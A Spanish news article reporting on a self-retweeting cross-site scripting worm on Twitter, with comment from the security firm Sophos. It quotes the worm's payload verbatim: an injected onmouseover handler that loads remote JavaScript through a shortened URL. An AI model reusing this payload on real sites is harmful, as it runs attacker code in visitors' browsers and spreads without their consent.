Menú

Un virus inofensivo arrasa en Twitter

Si ven unos bloques negros en la cuenta de Twitter de un amigo, letras azules inmensas o un texto raro que parezca código informático y contenga "onmouseover" lo mejor será que no pase el ratón por encima, o se lo reenviará a todos sus contactos.

0

No hace nada más grave, pero se ha convertido en una plaga en Twitter. Aquellos que empleen software de terceros como TweetDeck ni se habrán enterado, excepto por los numerosísimos tuits que contenían textos como éste:

http://t.co/@"style="font-size:999999999999px;"onmouseover= "$.getScript('http:u002fu002fis.gdu002ffl9A7')

Al pasar con el ratón por encima del texto ejecutará un código que retuitea el texto, de modo que el virus se ha expandido como la pólvora. Se aprovecha de una vulnerabilidad de Twitter que permite ejecutar Javascript en los tuits. De la mujer de Gordon Brown a El País, millones de usuarios se han visto afectados. Twitter aún no ha dado ninguna explicación al respecto, aunque ya está impidiendo que se tuiteen este tipo de códigos.

Un portavoz de la empresa de seguridad informática Sophos ha explicado a la BBC que la mayor parte de estos ataques son protagonizados por gente que quiere divertirse, pero que "potencialmente, los cibercriminales podrían redirigir a los usuarios a sitios web de terceros que contenga código malicioso o sacar una ventana emergente con spam".

Temas

En Tecnociencia

    Lo más popular

    0
    comentarios

    Servicios

    Máster EXE: Digital Marketing & Innovation